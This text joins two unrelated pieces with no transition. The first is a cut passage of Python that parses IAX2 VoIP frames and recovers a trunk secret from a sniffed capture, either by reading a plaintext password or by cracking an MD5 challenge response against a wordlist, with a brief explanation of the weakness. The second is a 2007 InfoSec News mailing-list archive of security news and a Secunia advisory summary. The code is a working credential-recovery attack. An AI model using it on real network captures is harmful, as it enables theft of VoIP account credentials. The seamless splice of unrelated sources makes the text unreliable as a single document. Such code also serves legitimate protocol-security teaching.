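    header = struct.pack("!HHIBBBB", 0x8000 | src_call, dst_call, 0, 0, 0,
                         IAX_FRAME_TYPE, subclass)
    return header + body


def parse_full_frame(frame):
    """Return {'type', 'subclass', 'ies'} for a full frame, or None for a mini frame."""
    if len(frame) < 12:
        return None
    src_call, _dst, _ts, _oseq, _iseq, ftype, subclass = struct.unpack("!HHIBBBB", frame[:12])
    if not src_call & 0x8000:
        return None
    ies, pos = {}, 12
    while pos + 2 <= len(frame):
        ie_type, ie_len = frame[pos], frame[pos + 1]
        ies[ie_type] = frame[pos + 2:pos + 2 + ie_len]
        pos += 2 + ie_len
    return {"type": ftype, "subclass": subclass, "ies": ies}


def recover_secret(frames, wordlist):
    """Walk a capture in order. PLAINTEXT auth hands the secret over directly; MD5 auth
    exposes challenge and MD5(challenge+secret), which are tested offline against a
    wordlist. Returns (method, secret-or-None)."""
    challenge = None
    for raw in frames:
        f = parse_full_frame(raw)
        if f is None or f["type"] != IAX_FRAME_TYPE:
            continue
        ies = f["ies"]
        if f["subclass"] == AUTHREQ and IE_CHALLENGE in ies:
            challenge = ies[IE_CHALLENGE].decode()
        elif f["subclass"] == AUTHREP:
            if IE_PASSWORD in ies:
                return "plaintext", ies[IE_PASSWORD].decode()
            if IE_MD5_RESULT in ies and challenge is not None:
                want = ies[IE_MD5_RESULT].decode()
                for cand in wordlist:
                    if iax2_md5_result(challenge, cand) == want:
                        return "md5-dictionary", cand
                return "md5-dictionary", None
    return None, None


# Constructed capture: what a sniffer between the peers would see. SECRET is used
# only to build the sample; the attacker side sees nothing but the frames.
SECRET = "welcome1"
CHALLENGE = "186532410"
CAPTURE_MD5 = [
    build_full_frame(1, 0, AUTHREQ, [(IE_AUTHMETHODS, struct.pack("!H", AUTH_MD5)),
                                     (IE_CHALLENGE, CHALLENGE.encode())]),
    build_full_frame(2, 1, AUTHREP, [(IE_MD5_RESULT,
                                      iax2_md5_result(CHALLENGE, SECRET).encode())]),
]
CAPTURE_PLAINTEXT = [
    build_full_frame(1, 0, AUTHREQ, [(IE_AUTHMETHODS, struct.pack("!H", AUTH_PLAINTEXT))]),
    build_full_frame(2, 1, AUTHREP, [(IE_PASSWORD, SECRET.encode())]),
]
WORDLIST = ["password", "123456", "asterisk", "welcome1", "letmein"]  # constructed

if __name__ == "__main__":
    print(recover_secret(CAPTURE_PLAINTEXT, WORDLIST))
    print(recover_secret(CAPTURE_MD5, WORDLIST))
```

The plaintext capture yields the secret with no work at all; the MD5 capture yields it as soon as the secret appears in the wordlist, and a long random secret is the only thing that defeats that step. Neither method authenticates the server or protects the exchange from a passive listener, which is why IAX2 also defines an RSA method and why trunk signalling should not cross an untrusted network unprotected.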
From alerts at infosecnews.org Wed Dec 19 00:28:07 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] eEye Ship Not 'Sinking,' CEO Says Message-ID: http://www.darkreading.com/document.asp?doc_id=141554 By Kelly Jackson Higgins Senior Editor Dark Reading December 17, 2007 eEye Digital Security has had plenty of upheaval this year, with the sudden departure of CEO Ross Brown in April, a round of layoffs and departures of sales and technical staff, and most recently, the quiet exodus of co-founder and CTO Marc Maiffret. (See eEye's Two Releases [1] and Maiffret Says Bye to eEye. [2]) But in an interview earlier today with Dark Reading, eEye CEO Kamal Arafeh said there's nothing to the most recent speculation that Maiffret has jumped a sinking ship. Talk of problems at eEye resurfaced last week after Maiffret disclosed that he had left the company back in September, and soon will launch a new non-security startup. Arafeh says eEye's revenue has actually increased 53 percent over the same period last year, and that it has diversified its customer base beyond the government agencies and large corporations it first targeted with its Retina vulnerability scanner. "We've restructured, and we have a more agile process on the engineering side, and roll out more products on [better] timeframes, and we have more people testing products to make sure they are up to snuff," says Arafeh, the former senior vice president of worldwide sales and marketing who took over the reins after Brown left the privately held company. Arafeh accepts much of the blame for the slowdown this year on the research side of eEye. He says he had to first get up to speed in understanding just how research could play with the company's products. "I had to grow professionally to understand that from our customers' perspective," he says. "We are re-emphasizing it... There's more of an emphasis on research today than there was six months ago." 
Look for eEye's vulnerability research to go more hand in hand with its products, he says. He says there are still some familiar faces from the company's original research team on board, including Andre Protas, who was recently named director of research and preview services for eEye. Arafeh was unable to divulge any information on the number of employees or the research team, however. But some security experts argue that eEye has not been in the spotlight much over the past year in public vulnerability research like it was the year before, or in its earlier days. Why the delayed announcement of Maiffret's departure? Arafeh says there was no single reason. "It was a combination of him being worried that people would make assumptions similar to what's coming out now [and other factors]," he says. "[People] blew it out of proportion." Maiffret said in an interview last week that he held off on spreading the word about his departure until the transition was complete. Meanwhile, Arafeh says eEye's main source of revenue continues to be its vulnerability assessment tool, Retina, which represents about 60 percent of its business, and that the company is working on expanding into the small- to medium-sized business market here as well. Next for eEye, he says, are more form factors for its products and technologies, including new services. The company also will roll out solutions in '08 that reduce the amount of time it takes to deploy its VA and Blink endpoint products, Arafeh hinted. Arafeh also revealed that in the next few weeks, the company will be moving from its home in Aliso Viejo, Calif., to a new headquarters space on the campus of the University of California-Irvine, where companies such as Cisco and Google also have a presence. 
[1] http://www.darkreading.com/blog.asp?blog_sectionid=342&doc_id=121064 [2] http://www.darkreading.com/document.asp?doc_id=141256 From alerts at infosecnews.org Thu Dec 20 00:21:15 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Cisco warns of firewall flaw in its Catalyst switches, 7600 Series routers Message-ID: http://www.networkworld.com/news/2007/121907-cisco-firewall-flaw.html By Linda Leung NetworkWorld.com 12/19/07 Cisco is warning that a flaw in its Firewall Services Module could result in a reload of the module, or if exploited repeatedly, could result in a sustained denial-of-service attack. FWSM is an integrated firewall module for Cisco Catalyst 6500 switches and Cisco 7600 Series routers. In its security alert issued Wednesday, Cisco says there are "no known instances of intentional exploitation of this issue," but that it has "observed data streams that appear to be unintentionally triggering this vulnerability." According to the security advisory, the security hole could be "triggered with standard network traffic, which is passed through the Application Layer Protocol Inspection process." The only FWSM release affected by this vulnerability is FWSM System Software version 3.2(3). FWSM software version 3.2(4) contains the fixes for the vulnerability and will be available for download the week beginning Dec. 31 at this URL [1]. A workaround for this vulnerability can be found at the security advisory [2]. All contents copyright 1995-2007 Network World, Inc. 
[1] http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-fwsm?psrtdcat20e2 [2] http://www.cisco.com/en/US/products/products_security_advisory09186a008091b11d.shtml From alerts at infosecnews.org Thu Dec 20 00:21:27 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Ohio Elections Official Calls Machines Flawed Message-ID: Forwarded from: Dave Dittrich InfoSec News wrote: > http://www.nytimes.com/2007/12/15/us/15ohio.html > > By Bob Driehaus > The New York Times > December 15, 2007 > > CINCINNATI - All five voting systems used in Ohio ...have critical > flaws... > At polling stations, teams working on the study were able to pick > locks to access memory cards and use hand-held devices to plug false > vote counts into machines. At boards of election, they were able to > introduce malignant software into servers. > > Ms. Brunner proposed replacing all of the state's voting machines, > including the touch-screen ones used in more than 50 of Ohio's 88 > counties. So when will we see a call for a refund on the millions of dollars spent on those highly flawed systems after the 2000 election? Or at minimum a legislatively mandated discount that will cap the profits on the next generation? When there is a shortage of funds available for computer security R&D, it's a shame to see orders of magnitude more money spent on systems that would have benefited from the R&D had that been done first, not after the problems are discovered. Do we always have to do things backwards? Sigh...
-- Dave Dittrich Information Assurance Researcher, dittrich (at) u.washington.edu The iSchool http://staff.washington.edu/dittrich University of Washington PGP key http://staff.washington.edu/dittrich/pgpkey.txt Fingerprint FE97 0C57 0843 F3EB 49A1 0CD0 8E0C D0BE C838 CCB5 From alerts at infosecnews.org Thu Dec 20 00:21:43 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Worm Squirms Through Google's Orkut Message-ID: http://www.eweek.com/article2/0,1895,2237733,00.asp By Ryan Naraine eWEEK.com December 19, 2007 Google's social network is hit by a fast moving worm that is attacking members of a Portuguese-language community. A fast moving worm is squirming though Google's Orkut social network, adding hundreds of thousands of users to an Orkut community created by a Brazilian hacker. The worm, which first appeared on Dec. 19, has been spreading through Orkut's Scrapbook system at a rapid pace, infecting more than 650,000 users in the space of a few hours. According to an alert from anti-virus specialist Trend Micro, infection starts when an Orkut user is sent an e-mail telling them that they have a new Scrapbook entry. Logging into Orkut, the victim is greeted with Portuguese-language text that reads: "2008 vem ai que ele comece mto bem para vc." This translates to "2008 is coming. I wish that it begins quite well for you." "No interaction is necessary. Simply looking at the scrap starts the infection sequence," says Trend Micro researcher Robert McArdle. Once the scrap is viewed, it deletes itself and the victim is automatically added to the "Infectados pelo Vírus do Orkut" community. Once a user becomes infected, the infected account downloads and executes an embedded JavaScript that sends a copy of the original Scrapbook post to all the victim's contacts.
According to McAfee researcher Vinay Mahadik, the worm is abusing the ability to add JavaScript content to Orkut Scrapbook entries, a feature that was only recently introduced by Google. "This clearly illustrates the issue with allowing rich-content on social/professional networking sites, and not sanitizing it enough," Mahadik said in an entry on the McAfee Avert Labs blog. This is the second major worm attack to take aim at a popular social network. In October 2005, the Samy worm used cross-site scripting techniques to spread through MySpace, infecting more than a million users in less than a day. From alerts at infosecnews.org Thu Dec 20 00:21:59 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Stolen laptop holds data on seniors Message-ID: http://www.pennlive.com/news/patriotnews/index.ssf?/base/news/1198033089169550.xml&coll=1 By Jan Murphy The Patriot-News December 19, 2007 A state Department of Aging-owned laptop computer containing personal information on nearly 21,000 senior citizens was stolen from a Johnstown home during a Dec. 5 break-in. The computer was issued to a department employee who works with the agencies on aging in Indiana, Union, Snyder and Clearfield counties. The employee was attending a funeral when the theft occurred, said Michele Bell Gopinath, a department spokeswoman. Police suspect the computer was taken for its street value, she said. There have been no reports of misuse of the information, which included names, addresses, Social Security numbers, some medical information and the services clients received, Gopinath said. The affected seniors are in the process of being notified, and credit protection from TransUnion will be provided for 90 days at a cost to the state of $23,000, she said. Seniors then have the option of having the credit protection extended for a year at the state's expense. Information on the computer was double password protected, Gopinath said. 
When the theft occurred, she said the department was in the process of encrypting computers and has since completed that work to provide additional protection. It also is in the process of centralizing information about clients so that the information does not have to be downloaded onto laptops when employees are out in the field, but that work is not completed, she said. "We believe this was an isolated incident and that the provisions we've taken with contacting TransUnion and contacting the consumers, should give our consumers and clients a sense of safety," Gopinath said. This is the third incident in four months where state-owned computers containing personal information of Pennsylvanians have been stolen. The other two thefts involved computers that contained information on more than 375,000 welfare clients. Jan Murphy: 232-0668 or jmurphy (at) patriot-news.com CONSUMER ALERT Concerned residents can call this toll-free line: 866-592-8622 From alerts at infosecnews.org Thu Dec 20 00:22:17 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Book Review: IT Security Interviews Exposed: Secrets to Landing Your Next Information Security Job Message-ID: http://books.slashdot.org/article.pl?sid=07/12/19/1547202 [ http://www.amazon.com/exec/obidos/ASIN/0471779873/c4iorg - WK] Author: Chris Butler Pages: 218 Publisher: Wiley Rating: 8 Reviewer: Ben Rothke ISBN: 0471779873 Summary Good review for a pro, but not for newbies. If you find information security challenging and either want a job in the field or are looking for a better job in the field, the book will be quite valuable. But for those looking for a hot security job, their shortcomings will likely show through in an interview, even with the help of this book. As to the actual content, chapter 1 provides a good overview of how to find, interview and get a security job.
The chapter contains many bits of helpful information, especially to those whose job seeking skills are deficient. A good piece of advice the authors state is that one should never pay a fee for headhunting services. There are many people that call themselves recruiters, but are nothing more than fax servers who charge for the service. The burden to pay is always on the hiring firm, and a job seeker should be extremely suspicious of anyone requesting a fee to find them a position. I would hope that in future editions of the book, the authors expand on chapter one. The chapter itself in fact could easily be made into a book in its own right. As part of the job search process, many job searchers do not ask themselves enough fundamental questions about whether they are indeed in the right place in their career. Such an approach is taken by Lee Kushner, founder and CEO of the information security recruitment firm LJ Kushner and Associates. Kushner formulated the following 7 questions that every information security job candidate should ask themselves: 1. What are my long and short term plans? 2. What are my strengths and weaknesses? 3. What skills do I need to develop? 4. Have I acquired a new skill during the past year? 5. What are my most significant career accomplishments and will I soon achieve another one? 6. Have I been promoted over the past three years? 7. What investments have I made in my own career? The other 9 chapters of the book all have the same format; an overview of the topic, and then various questions an interviewer may pose. The reality is that these topics of network and security fundamentals, firewalls, regulations, wireless, security tools, and more, are essential knowledge for a security professional. Anyone trying to go through a comprehensive information security interview and wing it by reviewing the material will likely only succeed if the interviewer is inept.
Anyone attempting to mimic the questions and answers in the book in a real-world interview will immediately be found to be a sham if the interviewer deviates even slightly from the script, which should be expected. What really separates a good candidate from a great candidate is hands-on, practical and real-world security experience. Such a candidate won't need a question and answer format to showcase themselves in an interview. Their experience should shine, and not their ability to rattle off security acronyms.

If a company is serious about hiring qualified people, the interview process should not be about short technical questions and acronym definitions. It should entail an open discussion with significant give and take. Having a candidate detail their methodology for deploying and configuring a firewall should be given more credence than their ability to define the TCP three-way handshake.

Ultimately, the efficacy of the book is in the disposition of the reader. For the security newbie who wants a crash course in security in order to quickly land a security job, heaven help the company that would hire such a person. While one should indeed not judge a book by its cover, this book's cover and title may lead some readers to think that the book is their golden ticket to a quick landing into a great career. The breadth of information that a security professional needs to know precludes any sort of cramming or quick introduction. Those with a lack of security experience attempting to use this book to hide their shortcomings will only embarrass themselves in an interview.

On the other hand, the reader who has a background in information security and wants an update on network and security fundamentals will find IT Security Interviews Exposed a helpful title. The book contains a plethora of valuable information written in a clear and easy to read style.
In a little over 200 pages, the book is able to provide the reader with a good review of what they know or may have forgotten. Used in such a setting by such a reader, the book is a most helpful tool for the serious security professional looking to advance their career.

-=-

Ben Rothke is a security consultant with BT INS and the author of Computer Security: 20 Things Every Employee Should Know.

From alerts at infosecnews.org Thu Dec 20 00:22:29 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:51 2008
Subject: [ISN] Tiger Team brings haxploitation to TV
Message-ID:

http://www.theregister.co.uk/2007/12/19/tiger_team/

By John Leyden
The Register
19th December 2007

The haxploitation genre is coming to the small screen with a forthcoming series about a team of penetration testers. Tiger Team follows a group of elite freelance security consultants hired to test organisations' security by using social engineering, hacking, and physically defeating security mechanisms. So we expect to see our heroes picking locks and going through the trash to get clues, all the while maintaining an uneasy relationship with their clients and law enforcement officials.

The plot elements have appeared before in films such as Sneakers [1], starring Robert Redford. It's hard to see how a story arc strong enough to sustain interest over the course of a TV series can be drawn from these elements.

The first programme [2] is due to screen at 11pm on Christmas Day on CourtTV, which is hardly a recipe for a large audience. On the plus side, those watching will probably be too sozzled to notice any plot holes or technical errors.

A radio interview with the stars of the show - Ryan Jones and Chris Nickerson - by a Denver station can be found here [3].
[1] http://www.imdb.com/title/tt0105435
[2] http://www.courttv.com/onair/shows/upcoming_series/#tiger_team
[3] http://preview.tinyurl.com/2lxkr7

From alerts at infosecnews.org Fri Dec 21 01:17:53 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:51 2008
Subject: [ISN] Alleged Wesselman's scammer indicted
Message-ID:

http://www.courierpress.com/news/2007/dec/19/alleged-wesselmans-scammer-indicted/

By Gavin Lesnick
Evansville Courier & Press
December 19, 2007

A Seattle woman will face federal charges for allegedly defrauding Wesselman's grocery stores of thousands of dollars. Carima Jansen was indicted by a federal grand jury in Indianapolis on the charges, which were investigated by the Federal Bureau of Investigation.

According to a press release issued this morning, the indictment alleges that the crime began when Wesselman's computer system was compromised in Evansville by a program that allowed perpetrators to obtain the user ID and password for the chain's bank account. The program infiltrated the system through a fraudulent e-mail that was purportedly sent by the Better Business Bureau, the release said.

Jansen allegedly opened a bank account with a counterfeit passport and then used the information from the program to transfer funds from Wesselman's account to her own. The release said she transferred $14,672 into the account and then withdrew nearly all of the stolen money in cash.

Jansen faces a maximum possible prison sentence of 10 years and a maximum possible fine of $250,000. An initial hearing will be scheduled before a U.S. Magistrate Judge in Evansville once Jansen is brought to Indiana by the United States Marshal. She is currently in custody in Washington.
From alerts at infosecnews.org Fri Dec 21 01:18:10 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:51 2008
Subject: [ISN] Secunia Weekly Summary - Issue: 2007-51
Message-ID:

========================================================================

The Secunia Weekly Advisory Summary
2007-12-13 - 2007-12-20

This week: 71 advisories

========================================================================
Table of Contents:

1) Word From Secunia
2) This Week In Brief
3) This Week's Top Ten Most Read Advisories
4) Vulnerabilities Summary Listing
5) Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched.

Download and test it today:
https://psi.secunia.com/

Read more about this new version:
https://psi.secunia.com/?page=changelog

========================================================================
2) This Week in Brief:

Some highly critical vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system.

A boundary error in the handling of QTL files can be exploited to cause a heap-based buffer overflow when a user views a specially crafted QTL file. Various unspecified errors also exist in QuickTime's Flash media handler. Successful exploitation of any of these issues may allow execution of arbitrary code.

QuickTime 7.3.1 is patched against these vulnerabilities, and is available for Mac and Windows users.
For more information:
http://secunia.com/advisories/28092/

The Secunia Personal Software Inspector - Release Candidate 1 is now available, which you can use to check if your personal system is vulnerable:
https://psi.secunia.com/

--

Various vulnerabilities in Java have been reported and acknowledged in Mac OS X, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, cause a DoS (Denial of Service), or compromise a user's system.

An error in Java due to an improper access check can be exploited via a specially crafted Java applet to add or remove items from a user's Keychain, without prompting the user. This vulnerability affects Mac OS X versions prior to 10.5.

Some vulnerabilities in Java 1.4 and J2SE 5.0 can be exploited to bypass certain security restrictions, conduct cross-site scripting attacks, cause a DoS (Denial of Service), or compromise a user's system. Most of these vulnerabilities are known issues in Java from 2006 and 2007.

These vulnerabilities are reported in Mac OS X 10.4.10 and Mac OS X Server 10.4.10. Mac OS X v10.5 is reportedly not affected. Java Release 6 for Mac OS X 10.4 is now available for all users to resolve the issues.

For more information, including a complete list of Java vulnerabilities:
http://secunia.com/advisories/28115/

--

Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. Some of these vulnerabilities are due to known vulnerabilities in third-party software (such as Tar, CUPS, perl, and python), while some are vulnerabilities in Mac OS X components.

Apple has released Security Update 2007-09 to resolve these issues. Both Mac OS X 10.4 and 10.5 are affected. All users are urged to update their systems immediately.
For more information, including the complete list of all vulnerabilities:
http://secunia.com/advisories/28136/

--

Some vulnerabilities have been reported in Adobe Flash Player, where one vulnerability has an unknown impact and others can be exploited by malicious, local users to gain escalated privileges and by malicious people to bypass certain security restrictions, conduct cross-site scripting and HTTP request splitting attacks, disclose sensitive information, cause a Denial of Service (DoS), or potentially compromise a user's system.

One of the vulnerabilities is due to the use of vulnerable PCRE code, while another is a vulnerability present in the Flash Player in Opera browsers. Some vulnerabilities may be exploited to allow the execution of arbitrary code, making them highly critical issues.

Secunia urges all users to install version 9.0.115.0 to fix these issues.

For more information, including the complete list of all vulnerabilities:
http://secunia.com/advisories/28161/

The Secunia Personal Software Inspector - Release Candidate 1 is now available, which you can use to check if your personal system is vulnerable:
https://psi.secunia.com/

Corporate users can request a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable:
http://secunia.com/network_software_inspector/

--

VIRUS ALERTS:

During the past week Secunia collected 116 virus descriptions from the Antivirus vendors. However, none were deemed MEDIUM risk or higher according to the Secunia assessment scale.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA28036] Internet Explorer Multiple Code Execution Vulnerabilities
2. [SA28092] Apple QuickTime Multiple Vulnerabilities
3. [SA28095] SquirrelMail Package Compromise
4. [SA28161] Adobe Flash Player Multiple Vulnerabilities
5. [SA27992] JustSystems Ichitaro Document Processing Buffer Overflow
6. [SA28096] Sun Solaris 10 NFS "netgroups" Security Bypass Vulnerability
7. [SA28048] Mac OS X "cs_validate_page()" Local Denial of Service
8. [SA28072] Kerio WinRoute Firewall Proxy Server Unspecified Security Bypass
9. [SA28059] WebGUI Create Admin Security Bypass
10. [SA27969] TYPO3 "indexed_search" SQL Injection Vulnerability

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA28144] Rosoft Media Player File Processing Buffer Overflow Vulnerability
[SA28134] iMesh IMWebControl Class ActiveX Control Code Execution
[SA28120] PeerCast "handshakeHTTP()" Buffer Overflow Vulnerability
[SA28160] WFTPD Explorer LIST Reply Buffer Overflow Vulnerability
[SA28143] RaidenHTTPD "ulang" Local File Inclusion Vulnerability
[SA28111] phPay Local File Inclusion Vulnerability
[SA28131] St. Bernard Open File Manager Buffer Overflow Vulnerability
[SA28177] HP Software Update ContentCollection Class ActiveX Control Insecure Method
[SA28150] Citrix Web Interface Unspecified Cross-Site Scripting Vulnerability
[SA28142] SurgeMail Webmail "Host" Header Processing Denial of Service

UNIX/Linux:
[SA28157] Red Hat update for flash-plugin
[SA28136] Apple Mac OS X Security Update Fixes Multiple Vulnerabilities
[SA28135] Sun Solaris Firefox / Thunderbird Multiple Vulnerabilities
[SA28115] Mac OS X Java Multiple Vulnerabilities
[SA28112] Centreon "fileOreonConf" File Inclusion Vulnerabilities
[SA28084] HP-UX update for OpenSSL
[SA28170] Ubuntu update for kernel
[SA28167] IBM AIX Perl Regular Expressions Unicode Data Buffer Overflow
[SA28147] Ubuntu update for libgd2
[SA28132] Exiv2 EXIF Parsing Integer Overflow Vulnerability
[SA28114] Sun Solaris Gimp Multiple Vulnerabilities
[SA28113] Gentoo update for cups
[SA28109] Red Hat update for squid
[SA28103] Debian update for centericq
[SA28101] Debian update for link-grammar
[SA28091] Fedora update for squid
[SA28090] Gentoo update for ircservices
[SA28086] Debian update for mydns
[SA28151] Sun Management Center Default Account Security Issue
[SA28129] CUPS SNMP Backend "asn1_get_string()" Signedness Vulnerability
[SA28089] Avaya Products Samba "send_mailslot()" Buffer Overflow
[SA28087] HP-UX DCE swagentd Buffer Overflow Vulnerability
[SA28162] Red Hat update for kernel
[SA28107] rPath update for tetex
[SA28148] Sun Ray Device Manager Daemon Data Manipulation and DoS
[SA28108] Slackware update for mysql
[SA28099] Red Hat update for mysql
[SA28139] Alternate pdftops Filter for CUPS Insecure Temporary Files
[SA28123] scponly Command Passthrough Security Bypass
[SA28105] Linux Kernel "hrtimer_start()" Integer Overflow Vulnerability
[SA28097] Fedora update for autofs
[SA28094] Gentoo Portage "etc-update" Information Disclosure
[SA28088] rPath update for kernel
[SA28181] rPath update for kdebase
[SA28104] KDE KDM Local Denial of Service Weakness

Other:
[SA28175] Cisco Firewall Services Module Denial of Service Vulnerability
[SA28100] Juniper JUNOS BGP UPDATE Message Processing Denial of Service
[SA28096] Sun Solaris 10 NFS "netgroups" Security Bypass Vulnerability
[SA28093] NeoOffice Unspecified OpenOffice.org Vulnerability

Cross Platform:
[SA28169] Opera Multiple Vulnerabilities
[SA28161] Adobe Flash Player Multiple Vulnerabilities
[SA28117] ClamAV "cli_scanpe()" MEW Handling Integer Overflow
[SA28095] SquirrelMail Package Compromise
[SA28092] Apple QuickTime Multiple Vulnerabilities
[SA28155] phpMyRealty Two SQL Injection Vulnerabilities
[SA28154] Dokeos "My productions" Multiple Extensions File Upload Vulnerability
[SA28138] PunBB Automatic Image Upload with Thumbnails Module File Upload
[SA28137] LineShout Two Script Insertion Vulnerabilities
[SA28126] FreeWebshop.org Admin Credentials Information Disclosure
[SA28124] Hammer of Thyrion "HuffDecode()" Buffer Overflow Vulnerability
[SA28119] PHP Real Estate Classifieds "id" SQL Injection
[SA28110] exiftags Multiple Vulnerabilities
[SA28098] CourseMill Learning Management System "user" SQL Injection
[SA28164] GF-3XPLORER Cross-Site Scripting and Information Disclosure
[SA28149] Asterisk Registration Database Security Bypass
[SA28133] Mambo Two Cross-Site Scripting Vulnerabilities
[SA28130] WordPress Draft Information Disclosure
[SA28122] Google Web Toolkit Benchmark Reporting System Cross-Site Scripting
[SA28116] Ganglia Web Interface Multiple Cross-Site Scripting Vulnerabilities
[SA28106] Flyspray Two Cross-Site Scripting Vulnerabilities
[SA28118] syslog-ng Timestamps Denial of Service Vulnerability

========================================================================
5) Vulnerabilities Content Listing

Windows:
--
[SA28144] Rosoft Media Player File Processing Buffer Overflow Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2007-12-19

Juan Pablo Lopez Yacubian has discovered a vulnerability in Rosoft Media Player, which can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/28144/

--
[SA28134] iMesh IMWebControl Class ActiveX Control Code Execution
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2007-12-18

rgod has discovered a vulnerability in iMesh, which can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/28134/

--
[SA28120] PeerCast "handshakeHTTP()" Buffer Overflow Vulnerability
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2007-12-18

Luigi Auriemma has reported a vulnerability in PeerCast, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/28120/

--
[SA28160] WFTPD Explorer LIST Reply Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2007-12-19

r4x has reported a vulnerability in WFTPD Explorer, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/28160/

--
[SA28143] RaidenHTTPD "ulang" Local File Inclusion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information
Released: 2007-12-18

rgod has discovered a vulnerability in RaidenHTTPD, which can be exploited by malicious people to disclose sensitive information.

Full Advisory: http://secunia.com/advisories/28143/

--
[SA28111] phPay Local File Inclusion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information
Released: 2007-12-17

Michael Brooks has discovered a vulnerability in phPay, which can be exploited by malicious people to disclose sensitive information.

Full Advisory: http://secunia.com/advisories/28111/

--
[SA28131] St. Bernard Open File Manager Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2007-12-18

A vulnerability has been reported in St. Bernard Open File Manager, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/28131/

--
[SA28177] HP Software Update ContentCollection Class ActiveX Control Insecure Method
Critical: Less critical
Where: From remote
Impact: Manipulation of data
Released: 2007-12-20

porkythepig has reported a vulnerability in HP Software Update, which can be exploited by malicious people to overwrite arbitrary files on a user's system.
Full Advisory: http://secunia.com/advisories/28177/

--
[SA28150] Citrix Web Interface Unspecified Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-19

A vulnerability has been reported in Citrix Web Interface, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/28150/

--
[SA28142] SurgeMail Webmail "Host" Header Processing Denial of Service
Critical: Less critical
Where: From remote
Impact: DoS
Released: 2007-12-18

rgod has discovered a vulnerability in SurgeMail, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28142/

UNIX/Linux:
--
[SA28157] Red Hat update for flash-plugin
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data, Exposure of sensitive information, Privilege escalation, DoS, System access
Released: 2007-12-19

Red Hat has issued an update for flash-plugin. This fixes some vulnerabilities, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting and HTTP request splitting attacks, disclose sensitive information, cause a Denial of Service (DoS), or to potentially compromise a user's system.

Full Advisory: http://secunia.com/advisories/28157/

--
[SA28136] Apple Mac OS X Security Update Fixes Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Hijacking, Security Bypass, Cross Site Scripting, Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS, System access
Released: 2007-12-18

Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities.
Full Advisory: http://secunia.com/advisories/28136/

--
[SA28135] Sun Solaris Firefox / Thunderbird Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, Spoofing, Exposure of sensitive information, DoS, System access
Released: 2007-12-19

Sun has acknowledged some vulnerabilities in Sun Solaris, which can be exploited by malicious people to conduct spoofing and cross-site scripting attacks, to disclose sensitive information, and potentially to compromise a user's system.

Full Advisory: http://secunia.com/advisories/28135/

--
[SA28115] Mac OS X Java Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Privilege escalation, DoS, System access
Released: 2007-12-17

Some vulnerabilities have been reported and acknowledged in Mac OS X, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, to cause a DoS (Denial of Service), or to compromise a user's system.

Full Advisory: http://secunia.com/advisories/28115/

--
[SA28112] Centreon "fileOreonConf" File Inclusion Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2007-12-18

Michael Brooks has reported some vulnerabilities in Centreon, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/28112/

--
[SA28084] HP-UX update for OpenSSL
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2007-12-14

HP has issued an update for OpenSSL. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/28084/

--
[SA28170] Ubuntu update for kernel
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2007-12-20

Ubuntu has issued an update for the kernel.
This fixes some vulnerabilities, which can be exploited by malicious, local users and by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28170/

